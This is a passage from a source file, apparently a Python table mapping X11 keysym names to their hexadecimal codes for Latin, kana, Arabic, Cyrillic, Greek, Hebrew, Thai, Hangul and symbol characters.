'icircumflex': 0x00ee,
'idiaeresis': 0x00ef,
'eth': 0x00f0,
'ntilde': 0x00f1,
'ograve': 0x00f2,
'oacute': 0x00f3,
'ocircumflex': 0x00f4,
'otilde': 0x00f5,
'odiaeresis': 0x00f6,
'division': 0x00f7,
'oslash': 0x00f8,
'ooblique': 0x00f8,
'ugrave': 0x00f9,
'uacute': 0x00fa,
'ucircumflex': 0x00fb,
'udiaeresis': 0x00fc,
'yacute': 0x00fd,
'thorn': 0x00fe,
'ydiaeresis': 0x00ff,
'Aogonek': 0x01a1,
'breve': 0x01a2,
'Lstroke': 0x01a3,
'Lcaron': 0x01a5,
'Sacute': 0x01a6,
'Scaron': 0x01a9,
'Scedilla': 0x01aa,
'Tcaron': 0x01ab,
'Zacute': 0x01ac,
'Zcaron': 0x01ae,
'Zabovedot': 0x01af,
'aogonek': 0x01b1,
'ogonek': 0x01b2,
'lstroke': 0x01b3,
'lcaron': 0x01b5,
'sacute': 0x01b6,
'caron': 0x01b7,
'scaron': 0x01b9,
'scedilla': 0x01ba,
'tcaron': 0x01bb,
'zacute': 0x01bc,
'doubleacute': 0x01bd,
'zcaron': 0x01be,
'zabovedot': 0x01bf,
'Racute': 0x01c0,
'Abreve': 0x01c3,
'Lacute': 0x01c5,
'Cacute': 0x01c6,
'Ccaron': 0x01c8,
'Eogonek': 0x01ca,
'Ecaron': 0x01cc,
'Dcaron': 0x01cf,
'Dstroke': 0x01d0,
'Nacute': 0x01d1,
'Ncaron': 0x01d2,
'Odoubleacute': 0x01d5,
'Rcaron': 0x01d8,
'Uring': 0x01d9,
'Udoubleacute': 0x01db,
'Tcedilla': 0x01de,
'racute': 0x01e0,
'abreve': 0x01e3,
'lacute': 0x01e5,
'cacute': 0x01e6,
'ccaron': 0x01e8,
'eogonek': 0x01ea,
'ecaron': 0x01ec,
'dcaron': 0x01ef,
'dstroke': 0x01f0,
'nacute': 0x01f1,
'ncaron': 0x01f2,
'odoubleacute': 0x01f5,
'udoubleacute': 0x01fb,
'rcaron': 0x01f8,
'uring': 0x01f9,
'tcedilla': 0x01fe,
'abovedot': 0x01ff,
'Hstroke': 0x02a1,
'Hcircumflex': 0x02a6,
'Iabovedot': 0x02a9,
'Gbreve': 0x02ab,
'Jcircumflex': 0x02ac,
'hstroke': 0x02b1,
'hcircumflex': 0x02b6,
'idotless': 0x02b9,
'gbreve': 0x02bb,
'jcircumflex': 0x02bc,
'Cabovedot': 0x02c5,
'Ccircumflex': 0x02c6,
'Gabovedot': 0x02d5,
'Gcircumflex': 0x02d8,
'Ubreve': 0x02dd,
'Scircumflex': 0x02de,
'cabovedot': 0x02e5,
'ccircumflex': 0x02e6,
'gabovedot': 0x02f5,
'gcircumflex': 0x02f8,
'ubreve': 0x02fd,
'scircumflex': 0x02fe,
'kra': 0x03a2,
'kappa': 0x03a2,
'Rcedilla': 0x03a3,
'Itilde': 0x03a5,
'Lcedilla': 0x03a6,
'Emacron': 0x03aa,
'Gcedilla': 0x03ab,
'Tslash': 0x03ac,
'rcedilla': 0x03b3,
'itilde': 0x03b5,
'lcedilla': 0x03b6,
'emacron': 0x03ba,
'gcedilla': 0x03bb,
'tslash': 0x03bc,
'ENG': 0x03bd,
'eng': 0x03bf,
'Amacron': 0x03c0,
'Iogonek': 0x03c7,
'Eabovedot': 0x03cc,
'Imacron': 0x03cf,
'Ncedilla': 0x03d1,
'Omacron': 0x03d2,
'Kcedilla': 0x03d3,
'Uogonek': 0x03d9,
'Utilde': 0x03dd,
'Umacron': 0x03de,
'amacron': 0x03e0,
'iogonek': 0x03e7,
'eabovedot': 0x03ec,
'imacron': 0x03ef,
'ncedilla': 0x03f1,
'omacron': 0x03f2,
'kcedilla': 0x03f3,
'uogonek': 0x03f9,
'utilde': 0x03fd,
'umacron': 0x03fe,
'Babovedot': 0x1001e02,
'babovedot': 0x1001e03,
'Dabovedot': 0x1001e0a,
'Wgrave': 0x1001e80,
'Wacute': 0x1001e82,
'dabovedot': 0x1001e0b,
'Ygrave': 0x1001ef2,
'Fabovedot': 0x1001e1e,
'fabovedot': 0x1001e1f,
'Mabovedot': 0x1001e40,
'mabovedot': 0x1001e41,
'Pabovedot': 0x1001e56,
'wgrave': 0x1001e81,
'pabovedot': 0x1001e57,
'wacute': 0x1001e83,
'Sabovedot': 0x1001e60,
'ygrave': 0x1001ef3,
'Wdiaeresis': 0x1001e84,
'wdiaeresis': 0x1001e85,
'sabovedot': 0x1001e61,
'Wcircumflex': 0x1000174,
'Tabovedot': 0x1001e6a,
'Ycircumflex': 0x1000176,
'wcircumflex': 0x1000175,
'tabovedot': 0x1001e6b,
'ycircumflex': 0x1000177,
'OE': 0x13bc,
'oe': 0x13bd,
'Ydiaeresis': 0x13be,
'overline': 0x047e,
'kana_fullstop': 0x04a1,
'kana_openingbracket': 0x04a2,
'kana_closingbracket': 0x04a3,
'kana_comma': 0x04a4,
'kana_conjunctive': 0x04a5,
'kana_middledot': 0x04a5,
'kana_WO': 0x04a6,
'kana_a': 0x04a7,
'kana_i': 0x04a8,
'kana_u': 0x04a9,
'kana_e': 0x04aa,
'kana_o': 0x04ab,
'kana_ya': 0x04ac,
'kana_yu': 0x04ad,
'kana_yo': 0x04ae,
'kana_tsu': 0x04af,
'kana_tu': 0x04af,
'prolongedsound': 0x04b0,
'kana_A': 0x04b1,
'kana_I': 0x04b2,
'kana_U': 0x04b3,
'kana_E': 0x04b4,
'kana_O': 0x04b5,
'kana_KA': 0x04b6,
'kana_KI': 0x04b7,
'kana_KU': 0x04b8,
'kana_KE': 0x04b9,
'kana_KO': 0x04ba,
'kana_SA': 0x04bb,
'kana_SHI': 0x04bc,
'kana_SU': 0x04bd,
'kana_SE': 0x04be,
'kana_SO': 0x04bf,
'kana_TA': 0x04c0,
'kana_CHI': 0x04c1,
'kana_TI': 0x04c1,
'kana_TSU': 0x04c2,
'kana_TU': 0x04c2,
'kana_TE': 0x04c3,
'kana_TO': 0x04c4,
'kana_NA': 0x04c5,
'kana_NI': 0x04c6,
'kana_NU': 0x04c7,
'kana_NE': 0x04c8,
'kana_NO': 0x04c9,
'kana_HA': 0x04ca,
'kana_HI': 0x04cb,
'kana_FU': 0x04cc,
'kana_HU': 0x04cc,
'kana_HE': 0x04cd,
'kana_HO': 0x04ce,
'kana_MA': 0x04cf,
'kana_MI': 0x04d0,
'kana_MU': 0x04d1,
'kana_ME': 0x04d2,
'kana_MO': 0x04d3,
'kana_YA': 0x04d4,
'kana_YU': 0x04d5,
'kana_YO': 0x04d6,
'kana_RA': 0x04d7,
'kana_RI': 0x04d8,
'kana_RU': 0x04d9,
'kana_RE': 0x04da,
'kana_RO': 0x04db,
'kana_WA': 0x04dc,
'kana_N': 0x04dd,
'voicedsound': 0x04de,
'semivoicedsound': 0x04df,
'kana_switch': 0xff7e,
'Farsi_0': 0x10006f0,
'Farsi_1': 0x10006f1,
'Farsi_2': 0x10006f2,
'Farsi_3': 0x10006f3,
'Farsi_4': 0x10006f4,
'Farsi_5': 0x10006f5,
'Farsi_6': 0x10006f6,
'Farsi_7': 0x10006f7,
'Farsi_8': 0x10006f8,
'Farsi_9': 0x10006f9,
'Arabic_percent': 0x100066a,
'Arabic_superscript_alef': 0x1000670,
'Arabic_tteh': 0x1000679,
'Arabic_peh': 0x100067e,
'Arabic_tcheh': 0x1000686,
'Arabic_ddal': 0x1000688,
'Arabic_rreh': 0x1000691,
'Arabic_comma': 0x05ac,
'Arabic_fullstop': 0x10006d4,
'Arabic_0': 0x1000660,
'Arabic_1': 0x1000661,
'Arabic_2': 0x1000662,
'Arabic_3': 0x1000663,
'Arabic_4': 0x1000664,
'Arabic_5': 0x1000665,
'Arabic_6': 0x1000666,
'Arabic_7': 0x1000667,
'Arabic_8': 0x1000668,
'Arabic_9': 0x1000669,
'Arabic_semicolon': 0x05bb,
'Arabic_question_mark': 0x05bf,
'Arabic_hamza': 0x05c1,
'Arabic_maddaonalef': 0x05c2,
'Arabic_hamzaonalef': 0x05c3,
'Arabic_hamzaonwaw': 0x05c4,
'Arabic_hamzaunderalef': 0x05c5,
'Arabic_hamzaonyeh': 0x05c6,
'Arabic_alef': 0x05c7,
'Arabic_beh': 0x05c8,
'Arabic_tehmarbuta': 0x05c9,
'Arabic_teh': 0x05ca,
'Arabic_theh': 0x05cb,
'Arabic_jeem': 0x05cc,
'Arabic_hah': 0x05cd,
'Arabic_khah': 0x05ce,
'Arabic_dal': 0x05cf,
'Arabic_thal': 0x05d0,
'Arabic_ra': 0x05d1,
'Arabic_zain': 0x05d2,
'Arabic_seen': 0x05d3,
'Arabic_sheen': 0x05d4,
'Arabic_sad': 0x05d5,
'Arabic_dad': 0x05d6,
'Arabic_tah': 0x05d7,
'Arabic_zah': 0x05d8,
'Arabic_ain': 0x05d9,
'Arabic_ghain': 0x05da,
'Arabic_tatweel': 0x05e0,
'Arabic_feh': 0x05e1,
'Arabic_qaf': 0x05e2,
'Arabic_kaf': 0x05e3,
'Arabic_lam': 0x05e4,
'Arabic_meem': 0x05e5,
'Arabic_noon': 0x05e6,
'Arabic_ha': 0x05e7,
'Arabic_heh': 0x05e7,
'Arabic_waw': 0x05e8,
'Arabic_alefmaksura': 0x05e9,
'Arabic_yeh': 0x05ea,
'Arabic_fathatan': 0x05eb,
'Arabic_dammatan': 0x05ec,
'Arabic_kasratan': 0x05ed,
'Arabic_fatha': 0x05ee,
'Arabic_damma': 0x05ef,
'Arabic_kasra': 0x05f0,
'Arabic_shadda': 0x05f1,
'Arabic_sukun': 0x05f2,
'Arabic_madda_above': 0x1000653,
'Arabic_hamza_above': 0x1000654,
'Arabic_hamza_below': 0x1000655,
'Arabic_jeh': 0x1000698,
'Arabic_veh': 0x10006a4,
'Arabic_keheh': 0x10006a9,
'Arabic_gaf': 0x10006af,
'Arabic_noon_ghunna': 0x10006ba,
'Arabic_heh_doachashmee': 0x10006be,
'Farsi_yeh': 0x10006cc,
'Arabic_farsi_yeh': 0x10006cc,
'Arabic_yeh_baree': 0x10006d2,
'Arabic_heh_goal': 0x10006c1,
'Arabic_switch': 0xff7e,
'Cyrillic_GHE_bar': 0x1000492,
'Cyrillic_ghe_bar': 0x1000493,
'Cyrillic_ZHE_descender': 0x1000496,
'Cyrillic_zhe_descender': 0x1000497,
'Cyrillic_KA_descender': 0x100049a,
'Cyrillic_ka_descender': 0x100049b,
'Cyrillic_KA_vertstroke': 0x100049c,
'Cyrillic_ka_vertstroke': 0x100049d,
'Cyrillic_EN_descender': 0x10004a2,
'Cyrillic_en_descender': 0x10004a3,
'Cyrillic_U_straight': 0x10004ae,
'Cyrillic_u_straight': 0x10004af,
'Cyrillic_U_straight_bar': 0x10004b0,
'Cyrillic_u_straight_bar': 0x10004b1,
'Cyrillic_HA_descender': 0x10004b2,
'Cyrillic_ha_descender': 0x10004b3,
'Cyrillic_CHE_descender': 0x10004b6,
'Cyrillic_che_descender': 0x10004b7,
'Cyrillic_CHE_vertstroke': 0x10004b8,
'Cyrillic_che_vertstroke': 0x10004b9,
'Cyrillic_SHHA': 0x10004ba,
'Cyrillic_shha': 0x10004bb,
'Cyrillic_SCHWA': 0x10004d8,
'Cyrillic_schwa': 0x10004d9,
'Cyrillic_I_macron': 0x10004e2,
'Cyrillic_i_macron': 0x10004e3,
'Cyrillic_O_bar': 0x10004e8,
'Cyrillic_o_bar': 0x10004e9,
'Cyrillic_U_macron': 0x10004ee,
'Cyrillic_u_macron': 0x10004ef,
'Serbian_dje': 0x06a1,
'Macedonia_gje': 0x06a2,
'Cyrillic_io': 0x06a3,
'Ukrainian_ie': 0x06a4,
'Ukranian_je': 0x06a4,
'Macedonia_dse': 0x06a5,
'Ukrainian_i': 0x06a6,
'Ukranian_i': 0x06a6,
'Ukrainian_yi': 0x06a7,
'Ukranian_yi': 0x06a7,
'Cyrillic_je': 0x06a8,
'Serbian_je': 0x06a8,
'Cyrillic_lje': 0x06a9,
'Serbian_lje': 0x06a9,
'Cyrillic_nje': 0x06aa,
'Serbian_nje': 0x06aa,
'Serbian_tshe': 0x06ab,
'Macedonia_kje': 0x06ac,
'Ukrainian_ghe_with_upturn': 0x06ad,
'Byelorussian_shortu': 0x06ae,
'Cyrillic_dzhe': 0x06af,
'Serbian_dze': 0x06af,
'numerosign': 0x06b0,
'Serbian_DJE': 0x06b1,
'Macedonia_GJE': 0x06b2,
'Cyrillic_IO': 0x06b3,
'Ukrainian_IE': 0x06b4,
'Ukranian_JE': 0x06b4,
'Macedonia_DSE': 0x06b5,
'Ukrainian_I': 0x06b6,
'Ukranian_I': 0x06b6,
'Ukrainian_YI': 0x06b7,
'Ukranian_YI': 0x06b7,
'Cyrillic_JE': 0x06b8,
'Serbian_JE': 0x06b8,
'Cyrillic_LJE': 0x06b9,
'Serbian_LJE': 0x06b9,
'Cyrillic_NJE': 0x06ba,
'Serbian_NJE': 0x06ba,
'Serbian_TSHE': 0x06bb,
'Macedonia_KJE': 0x06bc,
'Ukrainian_GHE_WITH_UPTURN': 0x06bd,
'Byelorussian_SHORTU': 0x06be,
'Cyrillic_DZHE': 0x06bf,
'Serbian_DZE': 0x06bf,
'Cyrillic_yu': 0x06c0,
'Cyrillic_a': 0x06c1,
'Cyrillic_be': 0x06c2,
'Cyrillic_tse': 0x06c3,
'Cyrillic_de': 0x06c4,
'Cyrillic_ie': 0x06c5,
'Cyrillic_ef': 0x06c6,
'Cyrillic_ghe': 0x06c7,
'Cyrillic_ha': 0x06c8,
'Cyrillic_i': 0x06c9,
'Cyrillic_shorti': 0x06ca,
'Cyrillic_ka': 0x06cb,
'Cyrillic_el': 0x06cc,
'Cyrillic_em': 0x06cd,
'Cyrillic_en': 0x06ce,
'Cyrillic_o': 0x06cf,
'Cyrillic_pe': 0x06d0,
'Cyrillic_ya': 0x06d1,
'Cyrillic_er': 0x06d2,
'Cyrillic_es': 0x06d3,
'Cyrillic_te': 0x06d4,
'Cyrillic_u': 0x06d5,
'Cyrillic_zhe': 0x06d6,
'Cyrillic_ve': 0x06d7,
'Cyrillic_softsign': 0x06d8,
'Cyrillic_yeru': 0x06d9,
'Cyrillic_ze': 0x06da,
'Cyrillic_sha': 0x06db,
'Cyrillic_e': 0x06dc,
'Cyrillic_shcha': 0x06dd,
'Cyrillic_che': 0x06de,
'Cyrillic_hardsign': 0x06df,
'Cyrillic_YU': 0x06e0,
'Cyrillic_A': 0x06e1,
'Cyrillic_BE': 0x06e2,
'Cyrillic_TSE': 0x06e3,
'Cyrillic_DE': 0x06e4,
'Cyrillic_IE': 0x06e5,
'Cyrillic_EF': 0x06e6,
'Cyrillic_GHE': 0x06e7,
'Cyrillic_HA': 0x06e8,
'Cyrillic_I': 0x06e9,
'Cyrillic_SHORTI': 0x06ea,
'Cyrillic_KA': 0x06eb,
'Cyrillic_EL': 0x06ec,
'Cyrillic_EM': 0x06ed,
'Cyrillic_EN': 0x06ee,
'Cyrillic_O': 0x06ef,
'Cyrillic_PE': 0x06f0,
'Cyrillic_YA': 0x06f1,
'Cyrillic_ER': 0x06f2,
'Cyrillic_ES': 0x06f3,
'Cyrillic_TE': 0x06f4,
'Cyrillic_U': 0x06f5,
'Cyrillic_ZHE': 0x06f6,
'Cyrillic_VE': 0x06f7,
'Cyrillic_SOFTSIGN': 0x06f8,
'Cyrillic_YERU': 0x06f9,
'Cyrillic_ZE': 0x06fa,
'Cyrillic_SHA': 0x06fb,
'Cyrillic_E': 0x06fc,
'Cyrillic_SHCHA': 0x06fd,
'Cyrillic_CHE': 0x06fe,
'Cyrillic_HARDSIGN': 0x06ff,
'Greek_ALPHAaccent': 0x07a1,
'Greek_EPSILONaccent': 0x07a2,
'Greek_ETAaccent': 0x07a3,
'Greek_IOTAaccent': 0x07a4,
'Greek_IOTAdieresis': 0x07a5,
'Greek_IOTAdiaeresis': 0x07a5,
'Greek_OMICRONaccent': 0x07a7,
'Greek_UPSILONaccent': 0x07a8,
'Greek_UPSILONdieresis': 0x07a9,
'Greek_OMEGAaccent': 0x07ab,
'Greek_accentdieresis': 0x07ae,
'Greek_horizbar': 0x07af,
'Greek_alphaaccent': 0x07b1,
'Greek_epsilonaccent': 0x07b2,
'Greek_etaaccent': 0x07b3,
'Greek_iotaaccent': 0x07b4,
'Greek_iotadieresis': 0x07b5,
'Greek_iotaaccentdieresis': 0x07b6,
'Greek_omicronaccent': 0x07b7,
'Greek_upsilonaccent': 0x07b8,
'Greek_upsilondieresis': 0x07b9,
'Greek_upsilonaccentdieresis': 0x07ba,
'Greek_omegaaccent': 0x07bb,
'Greek_ALPHA': 0x07c1,
'Greek_BETA': 0x07c2,
'Greek_GAMMA': 0x07c3,
'Greek_DELTA': 0x07c4,
'Greek_EPSILON': 0x07c5,
'Greek_ZETA': 0x07c6,
'Greek_ETA': 0x07c7,
'Greek_THETA': 0x07c8,
'Greek_IOTA': 0x07c9,
'Greek_KAPPA': 0x07ca,
'Greek_LAMDA': 0x07cb,
'Greek_LAMBDA': 0x07cb,
'Greek_MU': 0x07cc,
'Greek_NU': 0x07cd,
'Greek_XI': 0x07ce,
'Greek_OMICRON': 0x07cf,
'Greek_PI': 0x07d0,
'Greek_RHO': 0x07d1,
'Greek_SIGMA': 0x07d2,
'Greek_TAU': 0x07d4,
'Greek_UPSILON': 0x07d5,
'Greek_PHI': 0x07d6,
'Greek_CHI': 0x07d7,
'Greek_PSI': 0x07d8,
'Greek_OMEGA': 0x07d9,
'Greek_alpha': 0x07e1,
'Greek_beta': 0x07e2,
'Greek_gamma': 0x07e3,
'Greek_delta': 0x07e4,
'Greek_epsilon': 0x07e5,
'Greek_zeta': 0x07e6,
'Greek_eta': 0x07e7,
'Greek_theta': 0x07e8,
'Greek_iota': 0x07e9,
'Greek_kappa': 0x07ea,
'Greek_lamda': 0x07eb,
'Greek_lambda': 0x07eb,
'Greek_mu': 0x07ec,
'Greek_nu': 0x07ed,
'Greek_xi': 0x07ee,
'Greek_omicron': 0x07ef,
'Greek_pi': 0x07f0,
'Greek_rho': 0x07f1,
'Greek_sigma': 0x07f2,
'Greek_finalsmallsigma': 0x07f3,
'Greek_tau': 0x07f4,
'Greek_upsilon': 0x07f5,
'Greek_phi': 0x07f6,
'Greek_chi': 0x07f7,
'Greek_psi': 0x07f8,
'Greek_omega': 0x07f9,
'Greek_switch': 0xff7e,
'leftradical': 0x08a1,
'topleftradical': 0x08a2,
'horizconnector': 0x08a3,
'topintegral': 0x08a4,
'botintegral': 0x08a5,
'vertconnector': 0x08a6,
'topleftsqbracket': 0x08a7,
'botleftsqbracket': 0x08a8,
'toprightsqbracket': 0x08a9,
'botrightsqbracket': 0x08aa,
'topleftparens': 0x08ab,
'botleftparens': 0x08ac,
'toprightparens': 0x08ad,
'botrightparens': 0x08ae,
'leftmiddlecurlybrace': 0x08af,
'rightmiddlecurlybrace': 0x08b0,
'topleftsummation': 0x08b1,
'botleftsummation': 0x08b2,
'topvertsummationconnector': 0x08b3,
'botvertsummationconnector': 0x08b4,
'toprightsummation': 0x08b5,
'botrightsummation': 0x08b6,
'rightmiddlesummation': 0x08b7,
'lessthanequal': 0x08bc,
'notequal': 0x08bd,
'greaterthanequal': 0x08be,
'integral': 0x08bf,
'therefore': 0x08c0,
'variation': 0x08c1,
'infinity': 0x08c2,
'nabla': 0x08c5,
'approximate': 0x08c8,
'similarequal': 0x08c9,
'ifonlyif': 0x08cd,
'implies': 0x08ce,
'identical': 0x08cf,
'radical': 0x08d6,
'includedin': 0x08da,
'includes': 0x08db,
'intersection': 0x08dc,
'union': 0x08dd,
'logicaland': 0x08de,
'logicalor': 0x08df,
'partialderivative': 0x08ef,
'function': 0x08f6,
'leftarrow': 0x08fb,
'uparrow': 0x08fc,
'rightarrow': 0x08fd,
'downarrow': 0x08fe,
'blank': 0x09df,
'soliddiamond': 0x09e0,
'checkerboard': 0x09e1,
'ht': 0x09e2,
'ff': 0x09e3,
'cr': 0x09e4,
'lf': 0x09e5,
'nl': 0x09e8,
'vt': 0x09e9,
'lowrightcorner': 0x09ea,
'uprightcorner': 0x09eb,
'upleftcorner': 0x09ec,
'lowleftcorner': 0x09ed,
'crossinglines': 0x09ee,
'horizlinescan1': 0x09ef,
'horizlinescan3': 0x09f0,
'horizlinescan5': 0x09f1,
'horizlinescan7': 0x09f2,
'horizlinescan9': 0x09f3,
'leftt': 0x09f4,
'rightt': 0x09f5,
'bott': 0x09f6,
'topt': 0x09f7,
'vertbar': 0x09f8,
'emspace': 0x0aa1,
'enspace': 0x0aa2,
'em3space': 0x0aa3,
'em4space': 0x0aa4,
'digitspace': 0x0aa5,
'punctspace': 0x0aa6,
'thinspace': 0x0aa7,
'hairspace': 0x0aa8,
'emdash': 0x0aa9,
'endash': 0x0aaa,
'signifblank': 0x0aac,
'ellipsis': 0x0aae,
'doubbaselinedot': 0x0aaf,
'onethird': 0x0ab0,
'twothirds': 0x0ab1,
'onefifth': 0x0ab2,
'twofifths': 0x0ab3,
'threefifths': 0x0ab4,
'fourfifths': 0x0ab5,
'onesixth': 0x0ab6,
'fivesixths': 0x0ab7,
'careof': 0x0ab8,
'figdash': 0x0abb,
'leftanglebracket': 0x0abc,
'decimalpoint': 0x0abd,
'rightanglebracket': 0x0abe,
'marker': 0x0abf,
'oneeighth': 0x0ac3,
'threeeighths': 0x0ac4,
'fiveeighths': 0x0ac5,
'seveneighths': 0x0ac6,
'trademark': 0x0ac9,
'signaturemark': 0x0aca,
'trademarkincircle': 0x0acb,
'leftopentriangle': 0x0acc,
'rightopentriangle': 0x0acd,
'emopencircle': 0x0ace,
'emopenrectangle': 0x0acf,
'leftsinglequotemark': 0x0ad0,
'rightsinglequotemark': 0x0ad1,
'leftdoublequotemark': 0x0ad2,
'rightdoublequotemark': 0x0ad3,
'prescription': 0x0ad4,
'minutes': 0x0ad6,
'seconds': 0x0ad7,
'latincross': 0x0ad9,
'hexagram': 0x0ada,
'filledrectbullet': 0x0adb,
'filledlefttribullet': 0x0adc,
'filledrighttribullet': 0x0add,
'emfilledcircle': 0x0ade,
'emfilledrect': 0x0adf,
'enopencircbullet': 0x0ae0,
'enopensquarebullet': 0x0ae1,
'openrectbullet': 0x0ae2,
'opentribulletup': 0x0ae3,
'opentribulletdown': 0x0ae4,
'openstar': 0x0ae5,
'enfilledcircbullet': 0x0ae6,
'enfilledsqbullet': 0x0ae7,
'filledtribulletup': 0x0ae8,
'filledtribulletdown': 0x0ae9,
'leftpointer': 0x0aea,
'rightpointer': 0x0aeb,
'club': 0x0aec,
'diamond': 0x0aed,
'heart': 0x0aee,
'maltesecross': 0x0af0,
'dagger': 0x0af1,
'doubledagger': 0x0af2,
'checkmark': 0x0af3,
'ballotcross': 0x0af4,
'musicalsharp': 0x0af5,
'musicalflat': 0x0af6,
'malesymbol': 0x0af7,
'femalesymbol': 0x0af8,
'telephone': 0x0af9,
'telephonerecorder': 0x0afa,
'phonographcopyright': 0x0afb,
'caret': 0x0afc,
'singlelowquotemark': 0x0afd,
'doublelowquotemark': 0x0afe,
'cursor': 0x0aff,
'leftcaret': 0x0ba3,
'rightcaret': 0x0ba6,
'downcaret': 0x0ba8,
'upcaret': 0x0ba9,
'overbar': 0x0bc0,
'downtack': 0x0bc2,
'upshoe': 0x0bc3,
'downstile': 0x0bc4,
'underbar': 0x0bc6,
'jot': 0x0bca,
'quad': 0x0bcc,
'uptack': 0x0bce,
'circle': 0x0bcf,
'upstile': 0x0bd3,
'downshoe': 0x0bd6,
'rightshoe': 0x0bd8,
'leftshoe': 0x0bda,
'lefttack': 0x0bdc,
'righttack': 0x0bfc,
'hebrew_doublelowline': 0x0cdf,
'hebrew_aleph': 0x0ce0,
'hebrew_bet': 0x0ce1,
'hebrew_beth': 0x0ce1,
'hebrew_gimel': 0x0ce2,
'hebrew_gimmel': 0x0ce2,
'hebrew_dalet': 0x0ce3,
'hebrew_daleth': 0x0ce3,
'hebrew_he': 0x0ce4,
'hebrew_waw': 0x0ce5,
'hebrew_zain': 0x0ce6,
'hebrew_zayin': 0x0ce6,
'hebrew_chet': 0x0ce7,
'hebrew_het': 0x0ce7,
'hebrew_tet': 0x0ce8,
'hebrew_teth': 0x0ce8,
'hebrew_yod': 0x0ce9,
'hebrew_finalkaph': 0x0cea,
'hebrew_kaph': 0x0ceb,
'hebrew_lamed': 0x0cec,
'hebrew_finalmem': 0x0ced,
'hebrew_mem': 0x0cee,
'hebrew_finalnun': 0x0cef,
'hebrew_nun': 0x0cf0,
'hebrew_samech': 0x0cf1,
'hebrew_samekh': 0x0cf1,
'hebrew_ayin': 0x0cf2,
'hebrew_finalpe': 0x0cf3,
'hebrew_pe': 0x0cf4,
'hebrew_finalzade': 0x0cf5,
'hebrew_finalzadi': 0x0cf5,
'hebrew_zade': 0x0cf6,
'hebrew_zadi': 0x0cf6,
'hebrew_qoph': 0x0cf7,
'hebrew_kuf': 0x0cf7,
'hebrew_resh': 0x0cf8,
'hebrew_shin': 0x0cf9,
'hebrew_taw': 0x0cfa,
'hebrew_taf': 0x0cfa,
'Hebrew_switch': 0xff7e,
'Thai_kokai': 0x0da1,
'Thai_khokhai': 0x0da2,
'Thai_khokhuat': 0x0da3,
'Thai_khokhwai': 0x0da4,
'Thai_khokhon': 0x0da5,
'Thai_khorakhang': 0x0da6,
'Thai_ngongu': 0x0da7,
'Thai_chochan': 0x0da8,
'Thai_choching': 0x0da9,
'Thai_chochang': 0x0daa,
'Thai_soso': 0x0dab,
'Thai_chochoe': 0x0dac,
'Thai_yoying': 0x0dad,
'Thai_dochada': 0x0dae,
'Thai_topatak': 0x0daf,
'Thai_thothan': 0x0db0,
'Thai_thonangmontho': 0x0db1,
'Thai_thophuthao': 0x0db2,
'Thai_nonen': 0x0db3,
'Thai_dodek': 0x0db4,
'Thai_totao': 0x0db5,
'Thai_thothung': 0x0db6,
'Thai_thothahan': 0x0db7,
'Thai_thothong': 0x0db8,
'Thai_nonu': 0x0db9,
'Thai_bobaimai': 0x0dba,
'Thai_popla': 0x0dbb,
'Thai_phophung': 0x0dbc,
'Thai_fofa': 0x0dbd,
'Thai_phophan': 0x0dbe,
'Thai_fofan': 0x0dbf,
'Thai_phosamphao': 0x0dc0,
'Thai_moma': 0x0dc1,
'Thai_yoyak': 0x0dc2,
'Thai_rorua': 0x0dc3,
'Thai_ru': 0x0dc4,
'Thai_loling': 0x0dc5,
'Thai_lu': 0x0dc6,
'Thai_wowaen': 0x0dc7,
'Thai_sosala': 0x0dc8,
'Thai_sorusi': 0x0dc9,
'Thai_sosua': 0x0dca,
'Thai_hohip': 0x0dcb,
'Thai_lochula': 0x0dcc,
'Thai_oang': 0x0dcd,
'Thai_honokhuk': 0x0dce,
'Thai_paiyannoi': 0x0dcf,
'Thai_saraa': 0x0dd0,
'Thai_maihanakat': 0x0dd1,
'Thai_saraaa': 0x0dd2,
'Thai_saraam': 0x0dd3,
'Thai_sarai': 0x0dd4,
'Thai_saraii': 0x0dd5,
'Thai_saraue': 0x0dd6,
'Thai_sarauee': 0x0dd7,
'Thai_sarau': 0x0dd8,
'Thai_sarauu': 0x0dd9,
'Thai_phinthu': 0x0dda,
'Thai_maihanakat_maitho': 0x0dde,
'Thai_baht': 0x0ddf,
'Thai_sarae': 0x0de0,
'Thai_saraae': 0x0de1,
'Thai_sarao': 0x0de2,
'Thai_saraaimaimuan': 0x0de3,
'Thai_saraaimaimalai': 0x0de4,
'Thai_lakkhangyao': 0x0de5,
'Thai_maiyamok': 0x0de6,
'Thai_maitaikhu': 0x0de7,
'Thai_maiek': 0x0de8,
'Thai_maitho': 0x0de9,
'Thai_maitri': 0x0dea,
'Thai_maichattawa': 0x0deb,
'Thai_thanthakhat': 0x0dec,
'Thai_nikhahit': 0x0ded,
'Thai_leksun': 0x0df0,
'Thai_leknung': 0x0df1,
'Thai_leksong': 0x0df2,
'Thai_leksam': 0x0df3,
'Thai_leksi': 0x0df4,
'Thai_lekha': 0x0df5,
'Thai_lekhok': 0x0df6,
'Thai_lekchet': 0x0df7,
'Thai_lekpaet': 0x0df8,
'Thai_lekkao': 0x0df9,
'Hangul': 0xff31,
'Hangul_Start': 0xff32,
'Hangul_End': 0xff33,
'Hangul_Hanja': 0xff34,
'Hangul_Jamo': 0xff35,
'Hangul_Romaja': 0xff36,
'Hangul_Codeinput': 0xff37,
'Hangul_Jeonja': 0xff38,
'Hangul_Banja': 0xff39,
'Hangul_PreHanja': 0xff3a,
'Hangul_PostHanja': 0xff3b,
'Hangul_SingleCandidate': 0xff3c,
'Hangul_MultipleCandidate': 0xff3d,
'Hangul_PreviousCandidate': 0xff3e,
'Hangul_Special': 0xff3f,
'Hangul_switch': 0xff7e,
'Hangul_Kiyeog': 0x0ea1,
'Hangul_SsangKiyeog': 0x0ea2,
'Hangul_KiyeogSios': 0x0ea3,
'Hangul_Nieun': 0x0ea4,
'Hangul_NieunJieuj': 0x0ea5,
'Hangul_NieunHieuh': 0x0ea6,
'Hangul_Dikeud': 0x0ea7,
'Hangul_SsangDikeud': 0x0ea8,
'Hangul_Rieul': 0x0ea9,
'Hangul_RieulKiyeog': 0x0eaa,
'Hangul_RieulMieum': 0x0eab,
'Hangul_RieulPieub': 0x0eac,
'Hangul_RieulSios': 0x0ead,
'Hangul_RieulTieut': 0x0eae,
'Hangul_RieulPhieuf': 0x0eaf,
'Hangul_RieulHieuh': 0x0eb0,
'Hangul_Mieum': 0x0eb1,
'Hangul_Pieub': 0x0eb2,
'Hangul_SsangPieub': 0x0eb3,
'Hangul_PieubSios': 0x0eb4,
'Hangul_Sios': 0x0eb5,
'Hangul_SsangSios': 0x0eb6,
'Hangul_Ieung': 0x0eb7,
'Hangul_Jieuj': 0x0eb8,
'Hangul_SsangJieuj': 0x0eb9,
'Hangul_Cieuc': 0x0eba,
